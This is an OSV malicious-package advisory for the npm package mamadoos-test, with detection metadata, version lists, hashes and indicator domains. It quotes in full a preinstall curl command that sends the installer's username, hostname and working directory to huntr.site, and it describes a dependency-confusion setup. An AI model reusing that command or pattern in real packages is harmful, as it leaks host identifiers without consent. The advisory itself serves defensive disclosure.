MAL-2026-4605

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/mamadoos-test/MAL-2026-4605.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-4605
Published
2026-05-20T14:02:39Z
Modified
2026-05-26T06:02:39.730226609Z
Summary
Malicious code in mamadoos-test (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (21b5454856fbb360a162083d9d582eba3839b7105ce6e36490e188b3729388d4)

package.json declares a preinstall lifecycle hook that runs curl https://huntr.site/depconf/$(whoami)@$(hostname)?pwd=$(pwd), embedding the installer's OS username, hostname, and current working directory into the URL path/query. This fires unconditionally on npm install with no opt-in, leaking host-identifying information to a third-party endpoint. The package additionally declares itself as a dependency (mamadoos-test: ^10.0.0), a shape consistent with a dependency-confusion probe — installs of a colliding internal name resolve to this public package and beacon back. Regardless of whether the intent is research or active targeting, the installer-side effect is unconsented exfiltration of identifiers useful for follow-on attacks (locating internal hosts, mapping CI environments, fingerprinting build paths).

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-003565",
            "versions": [
                "10.1.0"
            ],
            "sha256": "2157659011628b870955375b0817f0efe48e349e33d56ce6df600fc2dd49b5b4",
            "source": "amazon-inspector",
            "modified_time": "2026-05-20T14:13:53Z",
            "import_time": "2026-05-26T05:50:52.252692546Z"
        },
        {
            "id": "IN-MAL-2026-003566",
            "versions": [
                "11.0.0"
            ],
            "sha256": "e902eada172d070291ec61612790e0c092d05c3b15e628f8f882c511421624bc",
            "source": "amazon-inspector",
            "modified_time": "2026-05-20T14:23:32Z",
            "import_time": "2026-05-26T05:50:52.343617136Z"
        },
        {
            "id": "IN-MAL-2026-003564",
            "versions": [
                "10.1.0"
            ],
            "sha256": "21b5454856fbb360a162083d9d582eba3839b7105ce6e36490e188b3729388d4",
            "source": "amazon-inspector",
            "modified_time": "2026-05-20T14:13:53Z",
            "import_time": "2026-05-26T05:50:52.095803077Z"
        },
        {
            "id": "IN-MAL-2026-003560",
            "versions": [
                "10.0.0"
            ],
            "sha256": "277d047f21aee2aec8b9d3cf07e8896540cb52a5422b8c8d23eebed8e53f2f75",
            "source": "amazon-inspector",
            "modified_time": "2026-05-20T14:02:39Z",
            "import_time": "2026-05-26T05:50:51.650607747Z"
        },
        {
            "id": "IN-MAL-2026-003567",
            "import_time": "2026-05-26T05:50:52.442455676Z",
            "sha256": "6cc33157a1957f8c02515b475a6cf70c8340a8bd8c98dd8a748b8d9cb57bf595",
            "source": "amazon-inspector",
            "modified_time": "2026-05-20T14:24:04Z",
            "versions": [
                "11.0.0"
            ]
        },
        {
            "id": "IN-MAL-2026-003559",
            "versions": [
                "10.0.0"
            ],
            "sha256": "b1f5386ccd6225cc257c44ad170e11b7ce8b580ba1d62877b71dbfdc41e0df49",
            "source": "amazon-inspector",
            "modified_time": "2026-05-20T14:02:39Z",
            "import_time": "2026-05-26T05:50:51.551698461Z"
        }
    ]
}
Affected packages

npm / mamadoos-test

Affected versions

10.*
10.0.0
10.1.0
11.*
11.0.0

Database specific

indicators
{
    "evidence_files": [
        {
            "path": "package.json",
            "sha256": "df62a8a3ba04f6eefd777b9053d6cce224e45d674f7724ddd94d9dcfdc53c198",
            "tlsh": "0dd022320c20d1f3bdca06a20825d00fba938e0b33882909eacb1404b0082b3d5a120f"
        }
    ],
    "package_integrity": [
        {
            "filename": "mamadoos-test-11.0.0.tgz",
            "hashes": {
                "sha512_sri": "sha512-uVdyeFLh9zElcmZbtwhTJ+CwQWeDsquCt8wPS+nqiZqc3mjEvlAIqVvic5FcLxYD7wVfSRjgnsqRoKVJN68FCQ==",
                "sha1": "7d5da3b38ce39f5549a8613c2a4981db095c9e4d"
            }
        }
    ],
    "domains": [
        "huntr.site"
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/mamadoos-test/MAL-2026-4605.json"
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]